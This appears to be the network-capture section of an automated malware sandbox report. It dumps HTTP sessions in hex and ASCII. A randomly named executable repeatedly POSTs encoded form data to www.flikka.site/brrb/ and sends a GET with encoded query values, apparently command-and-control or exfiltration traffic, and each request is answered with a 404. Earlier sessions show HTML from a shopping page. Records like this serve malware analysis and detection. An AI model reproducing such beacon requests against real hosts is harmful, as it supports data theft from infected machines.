                                                                                                                            Nov 7, 2024 10:51:26.416285038 CET1236INData Raw: 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 3c 74 69 74 6c 65 3e 47 56 4a 54 42 45
                                                                                                                            Data Ascii: ta name="viewport" content="width=device-width, initial-scale=1"> <title>GVJTBEST</title> <meta name="renderer" content="webkit"> <meta http-equiv="Cache-Control" content="no-siteapp"> <meta name="mobile-web-app-capable" conten
                                                                                                                            Nov 7, 2024 10:51:26.416296005 CET1236INData Raw: 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6c 7a 79 2d 74 77 2e 6f 73 73 2d 61 63 63 65 6c 65 72 61 74 65 2e 61 6c 69 79 75 6e 63 73 2e 63 6f 6d 2f 2f 74 65 6d 70 6c 61 74 65 73 2f
                                                                                                                            Data Ascii: "></script> <script src="https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/js/app.js"></script><style type="text/css"> .cus-header { position: fixed; top: 0; z-index: 6; height: 49px;
                                                                                                                            Nov 7, 2024 10:51:26.416306973 CET1236INData Raw: 68 69 64 64 65 6e 3b 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 61 6d 2d 68 65 61 64 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 0d 0a 20 20 20 20 20 20 20 20 74 6f 70 3a 20 30 3b 0d 0a 20 20 20
                                                                                                                            Data Ascii: hidden; } .am-header { position: fixed; top: 0; z-index: 10; height: 49px; line-height: 49px; padding: 0 10px; } .am-header-default { background-color: #fff
                                                                                                                            Nov 7, 2024 10:51:26.416321039 CET904INData Raw: 73 73 3d 22 63 61 6e 76 69 2d 6e 61 76 69 67 61 74 69 6f 6e 5f 5f 69 63 6f 6e 2d 77 72 61 70 70 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6c 7a 79 2d 74 77
                                                                                                                            Data Ascii: ss="canvi-navigation__icon-wrapper"> <img src="https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/home.png" alt="" style="width: 30px;"> </span> <span class="canvi-navigation_
                                                                                                                            Nov 7, 2024 10:51:26.598679066 CET1236INData Raw: 32 35 35 37 0d 0a e7 89 a9 e6 b5 81 e6 a2 9d e6 ac be 3c 2f 61 3e 3c 2f 6c 69 3e 0d 0a 09 09 09 20 3c 6c 69 3e 20 3c 61 20 68 72 65 66 3d 22 2f 61 62 6f 75 74 2f 74 68 2e 68 74 6d 6c 22 3e e9 80 80 e6 8f 9b e6 94 bf e7 ad 96 3c 2f 61 3e 3c 2f 6c
                                                                                                                            Data Ascii: 2557</a></li> <li> <a href="/about/th.html"></a></li> <li> <a href="/about/ys.html"></a></li> <li> <a href="/about/lxwm.html"></a></li> </ul>
                                                                                                                            Nov 7, 2024 10:51:26.598691940 CET212INData Raw: 8d e5 8b 99 e6 99 82 e9 96 93 ef bc 9a 28 55 54 43 2f 47 4d 54 2b 30 38 3a 30 30 29 3c 62 72 3e 39 3a 30 30 2d 31 38 3a 30 30 3c 2f 73 70 61 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 73 70 61 6e 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f
                                                                                                                            Data Ascii: (UTC/GMT+08:00)<br>9:00-18:00</span> </span> </li> </ul> <div style="border-bottom: 1px dashed #dcdcdc;"></div></aside><div class="cus-header"> <span cl
                                                                                                                            Nov 7, 2024 10:51:26.598717928 CET1236INData Raw: 61 73 73 3d 22 6a 73 2d 63 61 6e 76 69 2d 6f 70 65 6e 2d 62 75 74 74 6f 6e 2d 2d 6c 65 66 74 20 63 75 73 2d 68 65 61 64 65 72 2d 6c 65 66 74 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6c 7a 79 2d 74 77 2e 6f 73 73 2d 61 63 63 65
                                                                                                                            Data Ascii: ass="js-canvi-open-button--left cus-header-left"><img src="https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/menu.png" alt=""></span> <span class="cus-header-mid" style="color:black;font-weight:bold;">GVJTBEST </span>
                                                                                                                            Nov 7, 2024 10:51:26.598731041 CET1236INData Raw: 0a 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 37 35 25 3b 0d 0a 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20
                                                                                                                            Data Ascii: flex-direction: column; height: 75%; justify-content: center; align-items: center; /*overflow: hidden;*/ /*flex-shrink:0;*/}.sp_img img { width: auto; height: auto; max-width: 94%; max-he
                                                                                                                            Nov 7, 2024 10:51:26.598742008 CET1236INData Raw: 6c 61 73 73 3d 27 73 70 5f 70 72 69 63 65 27 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 4e 54 24 39 39 38 2e 30 30 26 6e 62 73 70 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 6c 3e 4e 54 24 31 30 30 30 2e 30 30 3c 2f 64 65 6c 3e 0d 0a
                                                                                                                            Data Ascii: lass='sp_price'> NT$998.00&nbsp; <del>NT$1000.00</del> </div> </a> <a class="search_product" href="/cp/9816.html"> <div class='sp_img'> <img src="https://lzy-tw.oss-
                                                                                                                            Nov 7, 2024 10:51:26.599497080 CET1236INData Raw: 39 39 38 2e 30 30 26 6e 62 73 70 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 6c 3e 4e 54 24 31 30 30 30 2e 30 30 3c 2f 64 65 6c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 0d 0a 20 20 20 20 3c 2f 61 3e 0d 0a 20 20 20 20 20
                                                                                                                            Data Ascii: 998.00&nbsp; <del>NT$1000.00</del> </div> </a> <a class="search_product" href="/cp/9906.html"> <div class='sp_img'> <img src="https://lzy-tw.oss-accelerate.aliyuncs.com/upload/20


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            22192.168.2.224918367.223.117.14280652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:51:31.891536951 CET2472OUTPOST /brrb/ HTTP/1.1
                                                                                                                            Host: www.flikka.site
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.flikka.site
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 2163
                                                                                                                            Referer: http://www.flikka.site/brrb/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Data Raw: 6d 46 70 74 59 62 3d 43 77 30 5a 79 30 4c 56 42 4d 37 39 43 66 42 5a 63 33 4a 6d 72 70 45 6a 79 4c 53 61 4b 67 4a 43 35 35 49 61 51 76 2f 62 63 47 53 59 67 4d 62 48 54 38 39 55 77 67 58 48 72 74 52 43 4c 44 6d 57 50 70 66 6b 6d 33 59 46 59 75 74 6a 73 2b 6e 45 69 33 68 6e 59 52 59 6d 51 30 54 39 76 6f 4c 43 55 53 35 35 55 6b 52 32 57 6a 62 44 34 51 47 45 53 59 52 45 32 2f 7a 6c 53 4c 79 2b 6e 69 6a 54 36 6d 44 58 4c 6a 78 48 53 77 64 6a 5a 35 6f 34 65 6f 56 66 6a 33 6e 53 35 36 4f 2f 34 43 69 79 46 50 30 71 32 78 37 4a 79 5a 62 64 57 35 4d 50 76 72 51 55 74 4e 78 69 6c 4f 62 55 6a 7a 4b 63 70 37 50 73 7a 2b 34 67 70 55 34 31 53 70 4e 71 42 35 37 2f 69 39 73 61 58 6d 74 4d 72 75 37 30 75 4a 52 2b 4f 56 57 69 2f 34 6b 56 4b 62 66 67 32 47 6c 44 6d 56 79 52 59 6b 68 30 38 2b 48 6c 2b 53 6d 35 34 71 33 79 54 66 4e 46 6b 42 73 58 58 53 79 2b 73 73 50 64 42 49 64 55 73 43 67 4b 45 35 7a 4d 57 58 44 48 31 2b 77 45 66 56 48 70 39 58 4e 38 7a 31 51 67 73 65 57 49 5a 41 64 5a 61 71 67 4a 66 57 76 2b 7a 47 71 [TRUNCATED]
                                                                                                                            Data Ascii: mFptYb=Cw0Zy0LVBM79CfBZc3JmrpEjyLSaKgJC55IaQv/bcGSYgMbHT89UwgXHrtRCLDmWPpfkm3YFYutjs+nEi3hnYRYmQ0T9voLCUS55UkR2WjbD4QGESYRE2/zlSLy+nijT6mDXLjxHSwdjZ5o4eoVfj3nS56O/4CiyFP0q2x7JyZbdW5MPvrQUtNxilObUjzKcp7Psz+4gpU41SpNqB57/i9saXmtMru70uJR+OVWi/4kVKbfg2GlDmVyRYkh08+Hl+Sm54q3yTfNFkBsXXSy+ssPdBIdUsCgKE5zMWXDH1+wEfVHp9XN8z1QgseWIZAdZaqgJfWv+zGqYJptZZTnm5P9nw/2LoF3BhEbkWo9LRb1aZXtk5QfMDY7SZ6NUfmSYfm6Sf7AMBiOtvGH0pYDR0iOsBVLthgPgzhdKFhuG7qJ2JeihSKsdrdmzcuvAsQDE+bcfsT/5OCtKflBE/3O9T9sZSvfm3OAcHRWu+11u9Mc0KxB+4B0OltipleNE8a6zonVQNBAmuAwP3eGPj9mdUeEnynYRmz+0yFu70GQXiZkMJXAgn4D7nHPLqbSSYwcDyC5AVm/nwHXX/zSB9U9R6b6FWw+p8sUibeJ9ozKzFVEzbhvrQcy/uUc5EGCIykBWPneOwbCWdRXyP2UyFaX8jE2F2yPMMgw1mLLQEbyr1lbSav2ozMHIe0dbtjHdPNfIYTimJECY/PplfJKXXYqV20yj/aQgwsPyhSc7QMkeDovwPlZFmv4CKjFlEysIU+seeei774jaHPTLJWsccTHkqU3UrkD/G0FmnDMJP4j6jVwwiug8zxFbg5SP16xfpwE8oHsNG7zmwwZhyrcrEWBB18DKt4tiFpf/NPJuH+A+8wIcTeOKIOtRK3hg22PNFp9UMPj9mTBGxJ5tr0bVFth/ojI5HmFHTGBRZQXM4KuSo+896ptnOGUzfPLZZNUG5EeklsxtXbrMOANXUtnrFdAIP4BISuac1To/SgB5sNa9kGG3B [TRUNCATED]
                                                                                                                            Nov 7, 2024 10:51:31.896534920 CET276OUTData Raw: 44 34 32 32 62 4b 38 6b 50 37 4b 39 69 6d 2f 38 31 4b 4c 62 2f 66 6b 68 5a 6c 34 4e 41 6c 42 4b 6e 39 6d 77 44 53 79 73 31 62 41 4f 53 42 4a 75 72 31 4d 35 75 65 38 62 66 32 42 57 69 2b 74 50 4b 77 5a 51 44 66 4a 62 79 34 6b 37 71 55 35 30 65 78
                                                                                                                            Data Ascii: D422bK8kP7K9im/81KLb/fkhZl4NAlBKn9mwDSys1bAOSBJur1M5ue8bf2BWi+tPKwZQDfJby4k7qU50exFZEmcclrtHJ0jOyJIKICGub06q1jI5vYF0++mELn9BYvY4p0vBqHUZdGn0CygNR8sZ61sTvQKOgd7Ym/0akUmOQcgfDE27kdejsg0EDOPmwkWUG+cCm8mBfL03gMADqn67JDzmMcC+UKyq52gidCHxYMjRJnfstX1
                                                                                                                            Nov 7, 2024 10:51:32.590548992 CET533INHTTP/1.1 404 Not Found
                                                                                                                            Date: Thu, 07 Nov 2024 09:51:32 GMT
                                                                                                                            Server: Apache
                                                                                                                            Content-Length: 389
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            23192.168.2.224918467.223.117.14280652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:51:34.438261986 CET787OUTPOST /brrb/ HTTP/1.1
                                                                                                                            Host: www.flikka.site
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.flikka.site
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 203
                                                                                                                            Referer: http://www.flikka.site/brrb/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Data Raw: 6d 46 70 74 59 62 3d 43 77 30 5a 79 30 4c 56 42 4d 37 39 43 63 70 5a 64 6c 68 6d 36 35 45 6a 69 62 53 61 41 41 4a 45 35 35 46 74 51 71 48 31 64 31 79 59 67 5a 6e 48 53 4f 6c 55 78 67 58 47 67 4e 52 47 45 6a 6d 6d 50 70 65 61 6d 32 6b 46 59 75 70 6a 74 62 6a 45 67 79 42 6b 61 68 59 6f 46 6b 54 47 76 70 32 70 55 53 31 54 55 6b 70 32 57 69 6e 44 2f 51 57 45 58 36 35 45 7a 50 79 75 55 4c 79 70 6e 69 6d 5a 36 6d 54 66 4c 6a 4e 48 54 42 78 6a 5a 6f 49 34 61 2f 4a 66 32 48 6e 66 69 4b 50 59 34 43 37 5a 4c 4d 63 67 7a 77 4c 41 73 36 4f 37 4c 2b 77 54 32 49 73 30 6a 2b 39 38 76 71 75 78 71 48 6a 71 30 77 3d 3d
                                                                                                                            Data Ascii: mFptYb=Cw0Zy0LVBM79CcpZdlhm65EjibSaAAJE55FtQqH1d1yYgZnHSOlUxgXGgNRGEjmmPpeam2kFYupjtbjEgyBkahYoFkTGvp2pUS1TUkp2WinD/QWEX65EzPyuULypnimZ6mTfLjNHTBxjZoI4a/Jf2HnfiKPY4C7ZLMcgzwLAs6O7L+wT2Is0j+98vquxqHjq0w==
                                                                                                                            Nov 7, 2024 10:51:35.119466066 CET533INHTTP/1.1 404 Not Found
                                                                                                                            Date: Thu, 07 Nov 2024 09:51:35 GMT
                                                                                                                            Server: Apache
                                                                                                                            Content-Length: 389
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            24192.168.2.224918567.223.117.14280652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:51:36.981237888 CET2472OUTPOST /brrb/ HTTP/1.1
                                                                                                                            Host: www.flikka.site
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.flikka.site
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 3627
                                                                                                                            Referer: http://www.flikka.site/brrb/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Data Raw: 6d 46 70 74 59 62 3d 43 77 30 5a 79 30 4c 56 42 4d 37 39 44 39 5a 5a 59 43 56 6d 71 70 45 6b 74 37 53 61 4b 67 4a 41 35 35 4a 74 51 76 2f 62 63 48 65 59 67 4f 44 48 54 73 39 55 69 77 58 47 6f 74 52 43 4c 44 6e 6b 50 70 4c 30 6d 33 55 56 59 6f 78 6a 73 39 2f 45 69 78 70 6e 4f 42 59 6d 53 30 54 46 76 70 32 38 55 53 6c 74 55 6e 46 49 57 6d 44 44 34 6a 2b 45 43 36 35 48 38 76 79 75 55 4c 79 62 6e 69 6e 41 36 6d 62 48 4c 69 45 61 53 32 4a 6a 5a 4a 6f 34 59 59 56 59 68 33 6e 54 39 36 4f 78 34 43 65 44 46 50 30 75 32 78 76 77 79 5a 58 64 45 38 51 50 76 6f 34 62 69 39 78 68 6f 75 62 55 2b 6a 4b 65 70 37 4f 7a 7a 2b 34 67 70 56 45 31 53 35 4e 71 42 34 37 2b 68 4e 73 61 55 6d 74 37 30 65 33 67 75 4a 46 41 4f 55 48 56 2f 50 38 56 4c 5a 33 67 78 32 6c 44 67 6c 79 4c 59 6b 68 31 6e 4f 47 62 2b 53 75 66 34 71 6d 2f 54 66 4e 46 6b 44 6b 58 47 77 4b 2b 38 4d 50 64 44 49 64 56 36 79 67 4c 45 35 6e 2b 57 58 33 48 31 2f 6f 45 63 47 66 70 73 43 35 2f 38 56 51 68 6f 65 58 75 53 67 64 4d 61 71 73 6a 66 57 6e 55 7a 46 43 [TRUNCATED]
                                                                                                                            Data Ascii: mFptYb=Cw0Zy0LVBM79D9ZZYCVmqpEkt7SaKgJA55JtQv/bcHeYgODHTs9UiwXGotRCLDnkPpL0m3UVYoxjs9/EixpnOBYmS0TFvp28USltUnFIWmDD4j+EC65H8vyuULybninA6mbHLiEaS2JjZJo4YYVYh3nT96Ox4CeDFP0u2xvwyZXdE8QPvo4bi9xhoubU+jKep7Ozz+4gpVE1S5NqB47+hNsaUmt70e3guJFAOUHV/P8VLZ3gx2lDglyLYkh1nOGb+Suf4qm/TfNFkDkXGwK+8MPdDIdV6ygLE5n+WX3H1/oEcGfpsC5/8VQhoeXuSgdMaqsjfWnUzFCYJrVZbynm+/9g+f3CsFrNhETeWo5bRYxaIWtk+WzPdY7UO6NaJmSyfm3zf5YMCWStsGn04f3SySOrXVK74wP0zh4XFg/d7fl2JuihQpEejtm2buubnwCD+bdmsSfHP3BKfmJEmE29T9saXvf88ucEHQqq+1pY9PE0LgR+4EAOptipieN9166Doj8rNApRuQkP38ePl76dT+El0nYS7j/cyBy70GEHiZMMKy8g1pD7onPH2LSZYwclyCtcVmuFwFDX/ySB7QpR9b6EQw/i2MUnbeRtoyGdFXkzJxPrDdy/s0cnb2CI9EBePnHxwausdVLyPjIyH6X/pk2G0yPTIgxomLbQEb+r1hnSdcuolrTIRkdZgDHLWdSwYTyEJGzD/JhlF4KXDKCW5kyl6aQ20sPahScnQJI0DYPwP3RFnLUBHjFiditXJusueaPU79SBE+fLJXccbhvkqk3UrkD8G0FinDQdP6rUjVwwj/g8zCtb0pSOpKxEtwFnoHgRG7rcwx1hgL8rEWBAxMDJ1othFpTYNPIJH+M+9DEcTM2KLtJRenhgmmPKPJ9ZMPimmWpsxLRttF7VAvJwhzI8FmFVdW9OZQbq4PWSoMo968RnN2UzdvLaStUTkUi4ltZDXa7lJx9XUevrDbILGoBcWuae1TlBSjg0sNytkBK3B [TRUNCATED]
                                                                                                                            Nov 7, 2024 10:51:36.986751080 CET1740OUTData Raw: 4d 59 32 56 62 4b 38 45 50 39 6a 41 69 6a 32 6b 31 4d 33 62 2f 2b 45 68 59 7a 77 4e 44 56 42 49 6e 39 6d 74 65 43 50 53 31 62 42 78 53 43 56 75 72 31 63 35 75 59 55 62 66 47 42 52 2f 2b 74 30 41 51 5a 54 4a 2f 4a 66 79 34 6b 46 71 56 56 65 65 7a
                                                                                                                            Data Ascii: MY2VbK8EP9jAij2k1M3b/+EhYzwNDVBIn9mteCPS1bBxSCVur1c5uYUbfGBR/+t0AQZTJ/Jfy4kFqVVeezJZF1kczKtHJkik8pIZZVO8b02m1nMpvqN09seEZhJBSvY1nUvGqHoxdG3oCwVoRtgZ1lsT+FWBkd7Sl/0XkUmmQcobDGzjkcGjsjcEFuPl3UXdH+cUm8iofL8ZgMQDqiK7bzjmPcC+cqyv/Gh2TiLuYMetPySh7yd
                                                                                                                            Nov 7, 2024 10:51:37.652642012 CET533INHTTP/1.1 404 Not Found
                                                                                                                            Date: Thu, 07 Nov 2024 09:51:37 GMT
                                                                                                                            Server: Apache
                                                                                                                            Content-Length: 389
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            25192.168.2.224918667.223.117.14280652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:51:39.523251057 CET529OUTGET /brrb/?mFptYb=Pyc5xCH2FNTrUJIJc2J3jfwJvYyqOHlrloocc6vOBweawvT0T5Z/uibAsKRSCDSof6T5ol8OWeU6iNzlygZ3OH11Snb2up2hISFSOV0LFhqb+gPNdrhH/8C3bcPF&Vta=nFypuDtholF HTTP/1.1
                                                                                                                            Host: www.flikka.site
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Nov 7, 2024 10:51:40.436044931 CET548INHTTP/1.1 404 Not Found
                                                                                                                            Date: Thu, 07 Nov 2024 09:51:40 GMT
                                                                                                                            Server: Apache
                                                                                                                            Content-Length: 389
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html; charset=utf-8
